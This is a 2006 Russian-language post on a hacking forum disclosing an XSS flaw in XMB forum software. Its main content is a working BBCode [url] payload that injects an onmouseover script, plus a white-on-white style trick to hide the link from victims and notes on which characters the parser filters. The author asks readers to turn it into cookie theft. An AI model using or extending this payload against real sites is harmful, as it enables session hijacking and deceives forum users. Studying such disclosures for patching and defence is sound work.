HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу XMB last ver. XSS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XMB last ver. XSS
  #1  
Старый 02.10.2006, 15:41
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
С нами: 10434081

Репутация: 31
Exclamation XMB last ver. XSS
В последних XMB нашёл XSS, как нарыть куки с помощью этого дела - не сообразил, кто додумается - отпишитесь.
Собственно вот сам код (уберите знак *(звездочка) из тегов):
Код:
[url*][url*= onmouseover=a=String.fromCharCode(40,99,41,32,66,114,97,104,109,97);alert(a) style=`color:#fff;background:#fff;`][/url*][/url*]
Надеюсь вы заметили
Код:
style=`color:#fff;background:#fff;`
С помощью этой чтуки можно изменить стиль текста ссылки, тем самым замаскировать её.
Проверено на IE, Firefox, Opera (8.4) - всё прекрасно работает.
p.s. для тех, кто собирается рыть дальше в этой ХСС сразу скажу - форум не парсит бб теги, если в них присутствует: ' , ".
Парсит: < , >, &=&amp; , &nbsp;=&amp;nbsp;(ыыы)... и т.п.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.